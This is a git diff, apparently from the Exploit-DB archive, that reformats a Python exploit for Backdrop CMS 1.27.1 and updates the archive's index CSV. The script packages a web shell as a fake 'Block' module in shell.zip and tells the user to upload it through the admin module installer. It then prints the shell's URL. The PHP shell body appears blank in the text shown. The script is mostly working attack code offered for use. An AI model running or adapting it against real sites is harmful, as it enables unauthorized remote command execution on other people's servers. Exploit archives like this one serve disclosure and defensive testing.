diff --git a/exploits/php/webapps/52021.py b/exploits/php/webapps/52021.py
index 4770b5099..8cf7609f0 100755
--- a/exploits/php/webapps/52021.py
+++ b/exploits/php/webapps/52021.py
@@ -1,4 +1,4 @@
-# Exploit Title: Backdrop CMS 1.27.1 - Remote Command Execution (RCE)
+# Exploit Title: Backdrop CMS 1.27.1 - Authenticated Remote Command Execution (RCE)
# Date: 04/27/2024
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://backdropcms.org/
@@ -10,88 +10,83 @@ import os
import time
import zipfile
-
-
def create_files():
-info_content = """
-type = module
-name = Block
-description = Controls the visual building blocks a page is constructed
-with. Blocks are boxes of content rendered into an area, or region, of a
-web page.
-package = Layouts
-tags[] = Blocks
-tags[] = Site Architecture
-version = BACKDROP_VERSION
-backdrop = 1.x
+ info_content = """
+ type = module
+ name = Block
+ description = Controls the visual building blocks a page is constructed
+ with. Blocks are boxes of content rendered into an area, or region, of a
+ web page.
+ package = Layouts
+ tags[] = Blocks
+ tags[] = Site Architecture
+ version = BACKDROP_VERSION
+ backdrop = 1.x
-configure = admin/structure/block
+ configure = admin/structure/block
-; Added by Backdrop CMS packaging script on 2024-03-07
-project = backdrop
-version = 1.27.1
-timestamp = 1709862662
-"""
-shell_info_path = "shell/shell.info"
-os.makedirs(os.path.dirname(shell_info_path), exist_ok=True) # Klasörü
-oluşturur
-with open(shell_info_path, "w") as file:
-file.write(info_content)
+ ; Added by Backdrop CMS packaging script on 2024-03-07
+ project = backdrop
+ version = 1.27.1
+ timestamp = 1709862662
+ """
+ shell_info_path = "shell/shell.info"
+ os.makedirs(os.path.dirname(shell_info_path), exist_ok=True) # Klasörüoluşturur
+ with open(shell_info_path, "w") as file:
+ file.write(info_content)
-shell_content = """
-
-
-
-
-
-
-
-
-"""
-shell_php_path = "shell/shell.php"
-with open(shell_php_path, "w") as file:
-file.write(shell_content)
-
-return shell_info_path, shell_php_path
+ shell_content = """
+
+
+
+
+
+
+
+
+ """
+ shell_php_path = "shell/shell.php"
+ with open(shell_php_path, "w") as file:
+ file.write(shell_content)
+ return shell_info_path, shell_php_path
def create_zip(info_path, php_path):
-zip_filename = "shell.zip"
-with zipfile.ZipFile(zip_filename, 'w') as zipf:
-# Dosyaları shell klasörü altında sakla
-zipf.write(info_path, arcname='shell/shell.info')
-zipf.write(php_path, arcname='shell/shell.php')
-return zip_filename
+ zip_filename = "shell.zip"
+ with zipfile.ZipFile(zip_filename, 'w') as zipf:
+ zipf.write(info_path, arcname='shell/shell.info')
+ zipf.write(php_path, arcname='shell/shell.php')
+ return zip_filename
def main(url):
-print("Backdrop CMS 1.27.1 - Remote Command Execution Exploit")
-time.sleep(3)
+ print("Backdrop CMS 1.27.1 - Remote Command Execution Exploit")
+ time.sleep(3)
-print("Evil module generating...")
-time.sleep(2)
+ print("Evil module generating...")
+ time.sleep(2)
-info_path, php_path = create_files()
-zip_filename = create_zip(info_path, php_path)
+ info_path, php_path = create_files()
+ zip_filename = create_zip(info_path, php_path)
-print("Evil module generated!", zip_filename)
-time.sleep(2)
+ print("Evil module generated!", zip_filename)
+ time.sleep(2)
-print("Go to " + url + "/admin/modules/install and upload the " +
-zip_filename + " for Manual Installation.")
-time.sleep(2)
+ print("Go to " + url + "/admin/modules/install and upload the " +
+ zip_filename + " for Manual Installation.")
+ time.sleep(2)
-print("Your shell address:", url + "/modules/shell/shell.php")
+ print("Your shell address:", url + "/modules/shell/shell.php")
if __name__ == "__main__":
-import sys
-if len(sys.argv) < 2:
-print("Usage: python script.py [url]")
-else:
-main(sys.argv[1])
\ No newline at end of file
+ import sys
+ if len(sys.argv) < 2:
+ print("Usage: python script.py [url]")
+ else:
+ main(sys.argv[1])
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 94b9d8aee..342d20cb5 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -14593,7 +14593,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
34828,exploits/php/webapps/34828.txt,"Backbone Technology Expression 18.9.2010 - Cross-Site Scripting",2010-10-06,"High-Tech Bridge SA",webapps,php,,2010-10-06,2014-09-30,1,,,,,,https://www.securityfocus.com/bid/43910/info
50323,exploits/php/webapps/50323.html,"Backdrop CMS 1.20.0 - 'Multiple' Cross-Site Request Forgery (CSRF)",2021-09-23,V1n1v131r4,webapps,php,,2021-09-23,2021-09-23,0,,,,,http://www.exploit-db.combackdrop.zip,
51905,exploits/php/webapps/51905.txt,"Backdrop CMS 1.23.0 - Stored XSS",2024-03-18,"Sinem Şahin",webapps,php,,2024-03-18,2024-03-18,0,,,,,,
-52021,exploits/php/webapps/52021.py,"Backdrop CMS 1.27.1 - Remote Command Execution (RCE)",2024-05-19,"Ahmet Ümit BAYRAM",webapps,php,,2024-05-19,2024-05-19,0,,,,,,
+52021,exploits/php/webapps/52021.py,"Backdrop CMS 1.27.1 - Authenticated Remote Command Execution (RCE)",2024-05-19,"Ahmet Ümit BAYRAM",webapps,php,,2024-05-19,2024-06-07,1,,,,,,
51597,exploits/php/webapps/51597.txt,"Backdrop Cms v1.25.1 - Stored Cross-Site Scripting (XSS)",2023-07-19,"Mirabbas Ağalarov",webapps,php,,2023-07-19,2023-07-19,0,,,,,,
5546,exploits/php/webapps/5546.txt,"BackLinkSpider 1.1 - 'cat_id' SQL Injection",2008-05-05,K-159,webapps,php,,2008-05-04,2016-11-25,1,OSVDB-45001;CVE-2008-2096,,,,,http://advisories.echo.or.id/adv/adv95-K-159-2008.txt
34045,exploits/php/webapps/34045.txt,"BackLinkSpider 1.3.1774 - 'cat_id' SQL Injection",2010-05-27,"sniper ip",webapps,php,,2010-05-27,2014-07-13,1,,,,,,https://www.securityfocus.com/bid/40398/info